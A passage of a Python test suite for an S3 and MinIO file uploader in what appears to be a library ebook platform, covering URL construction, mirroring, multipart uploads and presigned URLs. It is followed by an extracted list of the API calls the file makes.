"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf", ".pdf", DataSource.UNGLUE_IT, "On Books", "us-east-3", False, ), ] ) def test_book_url( self, name, buckets, identifier, expected_result, extension=None, data_source_name=None, title=None, region=None, open_access=True, ): # Arrange identifier = self._identifier(foreign_id=identifier) uploader = self._create_s3_uploader(region=region, **buckets) parameters = {"identifier": identifier, "open_access": open_access} if extension: parameters["extension"] = extension if title: parameters["title"] = title if data_source_name: data_source = DataSource.lookup(self._db, DataSource.UNGLUE_IT) parameters["data_source"] = data_source # Act result = uploader.book_url(**parameters) # Assert assert result == expected_result @parameterized.expand( [ ( "without_scaled_size", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename", ), ( "without_scaled_size_and_with_custom_region", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename", None, "us-east-3", ), ( "with_scaled_size", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename", 601, ), ( "with_scaled_size_and_custom_region", {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"}, DataSource.UNGLUE_IT, "ABOOK", "filename", "https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename", 601, "us-east-3", ), ] ) def test_cover_image_url( self, name, buckets, data_source_name, identifier, filename, expected_result, scaled_size=None, region=None, ): # identifier = self._identifier(foreign_id="ABOOK") # buckets = {S3Uploader.BOOK_COVERS_BUCKET_KEY : 'thecovers'} # uploader = self._uploader(**buckets) # m = uploader.cover_image_url # # unglueit = DataSource.lookup(self._db, DataSource.UNGLUE_IT) # identifier = self._identifier(foreign_id="ABOOK") # 
eq_('https://s3.amazonaws.com/thecovers/scaled/601/unglue.it/Gutenberg+ID/ABOOK/filename', # m(unglueit, identifier, "filename", scaled_size=601)) # Arrange data_source = DataSource.lookup(self._db, data_source_name) identifier = self._identifier(foreign_id=identifier) uploader = self._create_s3_uploader(region=region, **buckets) # Act result = uploader.cover_image_url( data_source, identifier, filename, scaled_size=scaled_size ) # Assert assert result == expected_result @parameterized.expand( [ ( "with_s3_bucket_and_end_time", "marc", "SHORT", "Lane", datetime_utc(2020, 1, 1, 0, 0, 0), "https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00/Lane.mrc", ), ( "with_s3_bucket_and_end_time_and_start_time", "marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), ), ( "with_s3_bucket_and_end_time_and_start_time_and_custom_region", "marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "https://marc.s3.us-east-2.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), "us-east-2", ), ( "with_http_bucket_and_end_time_and_start_time", "http://marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "http://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), ), ( "with_https_bucket_and_end_time_and_start_time", "https://marc", "SHORT", "Lane", datetime_utc(2020, 1, 2, 0, 0, 0), "https://marc/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc", datetime_utc(2020, 1, 1, 0, 0, 0), ), ] ) def test_marc_file_url( self, name, bucket, library_name, lane_name, end_time, expected_result, start_time=None, region=None, ): # Arrange library = self._library(short_name=library_name) lane = self._lane(display_name=lane_name) buckets = {S3UploaderConfiguration.MARC_BUCKET_KEY: bucket} uploader = self._create_s3_uploader(region=region, **buckets) # Act result = uploader.marc_file_url(library, lane, end_time, start_time) # Assert assert result == expected_result @parameterized.expand( [ ( "s3_path_style_request_without_region", "https://s3.amazonaws.com/bucket/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_path_style_request_with_region", "https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_virtual_hosted_style_request_with_global_endpoint", "https://bucket.s3.amazonaws.com/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_virtual_hosted_style_request_with_dashed_region", "https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "s3_virtual_hosted_style_request_with_dotted_region", "https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg", ("bucket", "directory/filename.jpg"), ), ( "http_url", "http://book-covers.nypl.org/directory/filename.jpg", ("book-covers.nypl.org", "directory/filename.jpg"), ), ( "https_url", "https://book-covers.nypl.org/directory/filename.jpg", ("book-covers.nypl.org", "directory/filename.jpg"), ), ( "http_url_with_escaped_symbols", "http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg", ("book-covers.nypl.org", "directory/filename with spaces!.jpg"), ), ( "http_url_with_escaped_symbols_but_unquote_set_to_false", 
"http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg", ("book-covers.nypl.org", "directory/filename+with+spaces%21.jpg"), False, ), ] ) def test_split_url(self, name, url, expected_result, unquote=True): # Arrange s3_uploader = self._create_s3_uploader() # Act result = s3_uploader.split_url(url, unquote) # Assert assert result == expected_result def test_mirror_one(self): edition, pool = self._edition(with_license_pool=True) original_cover_location = "http://example.com/a-cover.png" content = open(self.sample_cover_path("test-book-cover.png"), "rb").read() cover, ignore = pool.add_link( Hyperlink.IMAGE, original_cover_location, edition.data_source, Representation.PNG_MEDIA_TYPE, content=content, ) cover_rep = cover.resource.representation assert None == cover_rep.mirrored_at original_epub_location = "https://books.com/a-book.epub" epub, ignore = pool.add_link( Hyperlink.OPEN_ACCESS_DOWNLOAD, original_epub_location, edition.data_source, Representation.EPUB_MEDIA_TYPE, content="i'm an epub", ) epub_rep = epub.resource.representation assert None == epub_rep.mirrored_at s3 = self._create_s3_uploader(client_class=MockS3Client) # Mock final_mirror_url so we can verify that it's called with # the right arguments def mock_final_mirror_url(bucket, key): return "final_mirror_url was called with bucket %s, key %s" % (bucket, key) s3.final_mirror_url = mock_final_mirror_url book_url = "http://books-go/here.epub" cover_url = "http://s3.amazonaws.com/covers-go/here.png" s3.mirror_one(cover.resource.representation, cover_url) s3.mirror_one(epub.resource.representation, book_url) [ [data1, bucket1, key1, args1, ignore1], [data2, bucket2, key2, args2, ignore2], ] = s3.client.uploads # Both representations have had .mirror_url set and been # mirrored to those URLs. assert data1.startswith(b"\x89") assert "covers-go" == bucket1 assert "here.png" == key1 assert Representation.PNG_MEDIA_TYPE == args1["ContentType"] assert (utc_now() - cover_rep.mirrored_at).seconds < 10 assert b"i'm an epub" == data2 assert "books-go" == bucket2 assert "here.epub" == key2 assert Representation.EPUB_MEDIA_TYPE == args2["ContentType"] # In both cases, mirror_url was set to the result of final_mirror_url. assert ( "final_mirror_url was called with bucket books-go, key here.epub" == epub_rep.mirror_url ) assert ( "final_mirror_url was called with bucket covers-go, key here.png" == cover_rep.mirror_url ) # mirrored-at was set when the representation was 'mirrored' for rep in epub_rep, cover_rep: assert (utc_now() - rep.mirrored_at).seconds < 10 def test_mirror_failure(self): edition, pool = self._edition(with_license_pool=True) original_epub_location = "https://books.com/a-book.epub" epub, ignore = pool.add_link( Hyperlink.OPEN_ACCESS_DOWNLOAD, original_epub_location, edition.data_source, Representation.EPUB_MEDIA_TYPE, content="i'm an epub", ) epub_rep = epub.resource.representation uploader = self._create_s3_uploader(MockS3Client) # A network failure is treated as a transient error. uploader.client.fail_with = BotoCoreError() uploader.mirror_one(epub_rep, self._url) assert None == epub_rep.mirrored_at assert None == epub_rep.mirror_exception # An S3 credential failure is treated as a transient error. 
response = dict( Error=dict( Code=401, Message="Bad credentials", ) ) uploader.client.fail_with = ClientError(response, "SomeOperation") uploader.mirror_one(epub_rep, self._url) assert None == epub_rep.mirrored_at assert None == epub_rep.mirror_exception # Because the file was not successfully uploaded, # final_mirror_url was never called and mirror_url is # was not set. assert None == epub_rep.mirror_url # A bug in the code is not treated as a transient error -- # the exception propagates through. uploader.client.fail_with = Exception("crash!") pytest.raises(Exception, uploader.mirror_one, epub_rep, self._url) def test_svg_mirroring(self): edition, pool = self._edition(with_license_pool=True) original = self._url # Create an SVG cover for the book. svg = """<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" width="100" height="50"> <ellipse cx="50" cy="25" rx="50" ry="25" style="fill:blue;"/> </svg>""" hyperlink, ignore = pool.add_link( Hyperlink.IMAGE, original, edition.data_source, Representation.SVG_MEDIA_TYPE, content=svg, ) # 'Upload' it to S3. s3 = self._create_s3_uploader(MockS3Client) s3.mirror_one(hyperlink.resource.representation, self._url) [[data, bucket, key, args, ignore]] = s3.client.uploads assert Representation.SVG_MEDIA_TYPE == args["ContentType"] assert b"svg" in data assert b"PNG" not in data def test_multipart_upload(self): class MockMultipartS3Upload(MultipartS3Upload): completed = None aborted = None def __init__(self, uploader, representation, mirror_to): self.parts = [] MockMultipartS3Upload.completed = False MockMultipartS3Upload.aborted = False def upload_part(self, content): self.parts.append(content) def complete(self): MockMultipartS3Upload.completed = True def abort(self): MockMultipartS3Upload.aborted = True rep, ignore = create( self._db, Representation, url="http://books.mrc", media_type=Representation.MARC_MEDIA_TYPE, ) s3 = self._create_s3_uploader(MockS3Client) # Successful upload with s3.multipart_upload( rep, rep.url, upload_class=MockMultipartS3Upload ) as upload: assert [] == upload.parts assert False == upload.completed assert False == upload.aborted upload.upload_part("Part 1") upload.upload_part("Part 2") assert ["Part 1", "Part 2"] == upload.parts assert True == MockMultipartS3Upload.completed assert False == MockMultipartS3Upload.aborted assert None == rep.mirror_exception class FailingMultipartS3Upload(MockMultipartS3Upload): def upload_part(self, content): raise Exception("Error!") # Failed during upload with s3.multipart_upload( rep, rep.url, upload_class=FailingMultipartS3Upload ) as upload: upload.upload_part("Part 1") assert False == MockMultipartS3Upload.completed assert True == MockMultipartS3Upload.aborted assert "Error!" == rep.mirror_exception class AnotherFailingMultipartS3Upload(MockMultipartS3Upload): def complete(self): raise Exception("Error!") rep.mirror_exception = None # Failed during completion with s3.multipart_upload( rep, rep.url, upload_class=AnotherFailingMultipartS3Upload ) as upload: upload.upload_part("Part 1") assert False == MockMultipartS3Upload.completed assert True == MockMultipartS3Upload.aborted assert "Error!" 
== rep.mirror_exception @parameterized.expand( [ ( "default_expiration_parameter", None, int(S3UploaderConfiguration.S3_DEFAULT_PRESIGNED_URL_EXPIRATION), ), ( "empty_expiration_parameter", {S3UploaderConfiguration.S3_PRESIGNED_URL_EXPIRATION: 100}, 100, ), ] ) def test_sign_url(self, name, expiration_settings, expected_expiration): # Arrange region = "us-east-1" bucket = "bucket" filename = "filename" url = "https://{0}.s3.{1}.amazonaws.com/{2}".format(bucket, region, filename) expected_url = url + "?AWSAccessKeyId=KEY&Expires=1&Signature=S" settings = expiration_settings if expiration_settings else {} s3_uploader = self._create_s3_uploader(region=region, **settings) s3_uploader.split_url = MagicMock(return_value=(bucket, filename)) s3_uploader.client.generate_presigned_url = MagicMock(return_value=expected_url) # Act result = s3_uploader.sign_url(url) # Assert assert result == expected_url s3_uploader.split_url.assert_called_once_with(url) s3_uploader.client.generate_presigned_url.assert_called_once_with( "get_object", ExpiresIn=expected_expiration, Params={"Bucket": bucket, "Key": filename}, ) class TestMultiPartS3Upload(S3UploaderTest): def _representation(self): rep, ignore = create( self._db, Representation, url="http://bucket/books.mrc", media_type=Representation.MARC_MEDIA_TYPE, ) return rep def test_init(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) assert uploader == upload.uploader assert rep == upload.representation assert "bucket" == upload.bucket assert "books.mrc" == upload.filename assert 1 == upload.part_number assert [] == upload.parts assert 1 == upload.upload.get("UploadId") uploader.client.fail_with = Exception("Error!") pytest.raises(Exception, MultipartS3Upload, uploader, rep, rep.url) def test_upload_part(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) upload.upload_part("Part 1") upload.upload_part("Part 2") assert [ { "Body": "Part 1", "UploadId": 1, "PartNumber": 1, "Bucket": "bucket", "Key": "books.mrc", }, { "Body": "Part 2", "UploadId": 1, "PartNumber": 2, "Bucket": "bucket", "Key": "books.mrc", }, ] == uploader.client.parts assert 3 == upload.part_number assert [ {"ETag": "etag", "PartNumber": 1}, {"ETag": "etag", "PartNumber": 2}, ] == upload.parts uploader.client.fail_with = Exception("Error!") pytest.raises(Exception, upload.upload_part, "Part 3") def test_complete(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) upload.upload_part("Part 1") upload.upload_part("Part 2") upload.complete() assert [ { "Bucket": "bucket", "Key": "books.mrc", "UploadId": 1, "MultipartUpload": { "Parts": [ {"ETag": "etag", "PartNumber": 1}, {"ETag": "etag", "PartNumber": 2}, ], }, } ] == uploader.client.uploads def test_abort(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) upload.upload_part("Part 1") upload.upload_part("Part 2") upload.abort() assert [] == uploader.client.parts @pytest.mark.minio class TestS3UploaderIntegration(S3UploaderIntegrationTest): @parameterized.expand( [ ( "using_s3_uploader_and_open_access_bucket", functools.partial( S3Uploader, host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST, ), S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY, "test-bucket", True, ), ( 
"using_s3_uploader_and_protected_access_bucket", functools.partial( S3Uploader, host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST, ), S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY, "test-bucket", False, ), ( "using_minio_uploader_and_open_access_bucket", MinIOUploader, S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY, "test-bucket", True, { MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL }, ), ( "using_minio_uploader_and_protected_access_bucket", MinIOUploader, S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY, "test-bucket", False, { MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL }, ), ] ) def test_mirror( self, name, uploader_class, bucket_type, bucket_name, open_access, settings=None ): # Arrange book_title = "1234567890" book_content = "1234567890" identifier = Identifier(type=Identifier.ISBN, identifier=book_title) representation = Representation( content=book_content, media_type=Representation.EPUB_MEDIA_TYPE ) buckets = { bucket_type: bucket_name, } if settings: settings.update(buckets) else: settings = buckets s3_uploader = self._create_s3_uploader( uploader_class=uploader_class, **settings ) self.minio_s3_client.create_bucket(Bucket=bucket_name) # Act book_url = s3_uploader.book_url(identifier, open_access=open_access) s3_uploader.mirror_one(representation, book_url) # Assert response = self.minio_s3_client.list_objects(Bucket=bucket_name) assert "Contents" in response assert len(response["Contents"]) == 1 [object] = response["Contents"] assert object["Key"] == "ISBN/{0}.epub".format(book_title)
[((3093, 3170), 'os.environ.get', 'os.environ.get', (['"""SIMPLIFIED_TEST_MINIO_ENDPOINT_URL"""', '"""http://localhost:9000"""'], {}), "('SIMPLIFIED_TEST_MINIO_ENDPOINT_URL', 'http://localhost:9000')\n", (3107, 3170), False, 'import os\n'), ((3218, 3276), 'os.environ.get', 'os.environ.get', (['"""SIMPLIFIED_TEST_MINIO_USER"""', '"""minioadmin"""'], {}), "('SIMPLIFIED_TEST_MINIO_USER', 'minioadmin')\n", (3232, 3276), False, 'import os\n'), ((3328, 3390), 'os.environ.get', 'os.environ.get', (['"""SIMPLIFIED_TEST_MINIO_PASSWORD"""', '"""minioadmin"""'], {}), "('SIMPLIFIED_TEST_MINIO_PASSWORD', 'minioadmin')\n", (3342, 3390), False, 'import os\n'), ((3450, 3494), 'urllib.parse.urlsplit', 'urlsplit', (['SIMPLIFIED_TEST_MINIO_ENDPOINT_URL'], {}), '(SIMPLIFIED_TEST_MINIO_ENDPOINT_URL)\n', (3458, 3494), False, 'from urllib.parse import urlsplit\n'), ((7694, 7856), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('empty_credentials', None, None), ('empty_string_credentials', '', ''), (\n 'non_empty_string_credentials', 'username', 'password')]"], {}), "([('empty_credentials', None, None), (\n 'empty_string_credentials', '', ''), ('non_empty_string_credentials',\n 'username', 'password')])\n", (7714, 7856), False, 'from parameterized import parameterized\n'), ((10945, 12972), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('s3_url_with_path_without_slash', 'a-bucket', 'a-path',\n 'https://a-bucket.s3.amazonaws.com/a-path', None), (\n 's3_dummy_url_with_path_without_slash', 'dummy', 'dummy',\n 'https://dummy.s3.amazonaws.com/dummy', None), (\n 's3_path_style_url_with_path_without_slash', 'a-bucket', 'a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_path_style_dummy_url_with_path_without_slash',\n 'dummy', 'dummy', 'https://s3.amazonaws.com/dummy/dummy', None,\n S3AddressingStyle.PATH.value), ('s3_url_with_path_with_slash',\n 'a-bucket', '/a-path', 'https://a-bucket.s3.amazonaws.com/a-path', None\n ), ('s3_path_style_url_with_path_with_slash', 'a-bucket', '/a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://a-bucket.s3.us-east-2.amazonaws.com/a-path', 'us-east-2'), (\n 's3_path_style_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://s3.us-east-2.amazonaws.com/a-bucket/a-path', 'us-east-2',\n S3AddressingStyle.PATH.value), (\n 's3_url_with_custom_region_and_path_with_slash', 'a-bucket', '/a-path',\n 'https://a-bucket.s3.us-east-3.amazonaws.com/a-path', 'us-east-3'), (\n 's3_path_style_url_with_custom_region_and_path_with_slash', 'a-bucket',\n '/a-path', 'https://s3.us-east-3.amazonaws.com/a-bucket/a-path',\n 'us-east-3', S3AddressingStyle.PATH.value), (\n 'custom_http_url_and_path_without_slash', 'http://a-bucket.com/',\n 'a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'http://a-bucket.com/',\n '/a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_without_slash', 'https://a-bucket.com/',\n 'a-path', 'https://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'https://a-bucket.com/',\n '/a-path', 'https://a-bucket.com/a-path', None)]"], {}), "([('s3_url_with_path_without_slash', 'a-bucket',\n 'a-path', 'https://a-bucket.s3.amazonaws.com/a-path', None), (\n 's3_dummy_url_with_path_without_slash', 'dummy', 'dummy',\n 'https://dummy.s3.amazonaws.com/dummy', None), (\n 
's3_path_style_url_with_path_without_slash', 'a-bucket', 'a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_path_style_dummy_url_with_path_without_slash',\n 'dummy', 'dummy', 'https://s3.amazonaws.com/dummy/dummy', None,\n S3AddressingStyle.PATH.value), ('s3_url_with_path_with_slash',\n 'a-bucket', '/a-path', 'https://a-bucket.s3.amazonaws.com/a-path', None\n ), ('s3_path_style_url_with_path_with_slash', 'a-bucket', '/a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://a-bucket.s3.us-east-2.amazonaws.com/a-path', 'us-east-2'), (\n 's3_path_style_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://s3.us-east-2.amazonaws.com/a-bucket/a-path', 'us-east-2',\n S3AddressingStyle.PATH.value), (\n 's3_url_with_custom_region_and_path_with_slash', 'a-bucket', '/a-path',\n 'https://a-bucket.s3.us-east-3.amazonaws.com/a-path', 'us-east-3'), (\n 's3_path_style_url_with_custom_region_and_path_with_slash', 'a-bucket',\n '/a-path', 'https://s3.us-east-3.amazonaws.com/a-bucket/a-path',\n 'us-east-3', S3AddressingStyle.PATH.value), (\n 'custom_http_url_and_path_without_slash', 'http://a-bucket.com/',\n 'a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'http://a-bucket.com/',\n '/a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_without_slash', 'https://a-bucket.com/',\n 'a-path', 'https://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'https://a-bucket.com/',\n '/a-path', 'https://a-bucket.com/a-path', None)])\n", (10965, 12972), False, 'from parameterized import parameterized\n'), ((14809, 15699), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('implicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key'), (\n 'implicit_s3_url_template_with_custom_region', 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key', None,\n 'us-east-2'), ('explicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key', S3UploaderConfiguration.\n URL_TEMPLATE_DEFAULT), ('explicit_s3_url_template_with_custom_region',\n 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key',\n S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, 'us-east-2'), (\n 'http_url_template', 'bucket', 'the këy',\n 'http://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n URL_TEMPLATE_HTTP), ('https_url_template', 'bucket', 'the këy',\n 'https://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n URL_TEMPLATE_HTTPS)]"], {}), "([('implicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key'), (\n 'implicit_s3_url_template_with_custom_region', 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key', None,\n 'us-east-2'), ('explicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key', S3UploaderConfiguration.\n URL_TEMPLATE_DEFAULT), ('explicit_s3_url_template_with_custom_region',\n 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key',\n S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, 'us-east-2'), (\n 'http_url_template', 'bucket', 'the këy',\n 'http://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n URL_TEMPLATE_HTTP), ('https_url_template', 'bucket', 'the këy',\n 'https://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n 
URL_TEMPLATE_HTTPS)])\n", (14829, 15699), False, 'from parameterized import parameterized\n'), ((17198, 18493), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('with_gutenberg_cover_generator_data_source',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/'\n ), ('with_overdrive_data_source', 'test-book-covers-s3-bucket',\n DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/'), (\n 'with_overdrive_data_source_and_scaled_size',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/'\n , 300), ('with_gutenberg_cover_generator_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/'\n , None, 'us-east-3'), ('with_overdrive_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/',\n None, 'us-east-3'), (\n 'with_overdrive_data_source_and_scaled_size_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/'\n , 300, 'us-east-3')]"], {}), "([('with_gutenberg_cover_generator_data_source',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/'\n ), ('with_overdrive_data_source', 'test-book-covers-s3-bucket',\n DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/'), (\n 'with_overdrive_data_source_and_scaled_size',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/'\n , 300), ('with_gutenberg_cover_generator_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/'\n , None, 'us-east-3'), ('with_overdrive_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/',\n None, 'us-east-3'), (\n 'with_overdrive_data_source_and_scaled_size_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/'\n , 300, 'us-east-3')])\n", (17218, 18493), False, 'from parameterized import parameterized\n'), ((19589, 19872), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('with_default_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.amazonaws.com/'), (\n 'with_custom_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/',\n 'us-east-3')]"], {}), "([('with_default_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.amazonaws.com/'), (\n 'with_custom_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/',\n 'us-east-3')])\n", (19609, 19872), False, 'from parameterized import parameterized\n'), ((20328, 20766), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('s3_url', 'test-marc-s3-bucket', 'SHORT',\n 
'https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/'), (\n 's3_url_with_custom_region', 'test-marc-s3-bucket', 'SHORT',\n 'https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/',\n 'us-east-2'), ('custom_http_url', 'http://my-feed/', 'SHORT',\n 'http://my-feed/SHORT/'), ('custom_https_url', 'https://my-feed/',\n 'SHORT', 'https://my-feed/SHORT/')]"], {}), "([('s3_url', 'test-marc-s3-bucket', 'SHORT',\n 'https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/'), (\n 's3_url_with_custom_region', 'test-marc-s3-bucket', 'SHORT',\n 'https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/',\n 'us-east-2'), ('custom_http_url', 'http://my-feed/', 'SHORT',\n 'http://my-feed/SHORT/'), ('custom_https_url', 'https://my-feed/',\n 'SHORT', 'https://my-feed/SHORT/')])\n", (20348, 20766), False, 'from parameterized import parameterized\n'), ((21368, 23249), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('with_identifier', {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY:\n 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub'), (\n 'with_custom_extension', {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY:\n 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', 'pdf'), (\n 'with_custom_dotted_extension', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', '.pdf'),\n ('with_custom_data_source', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub',\n None, DataSource.UNGLUE_IT), ('with_custom_title', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub',\n None, None, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 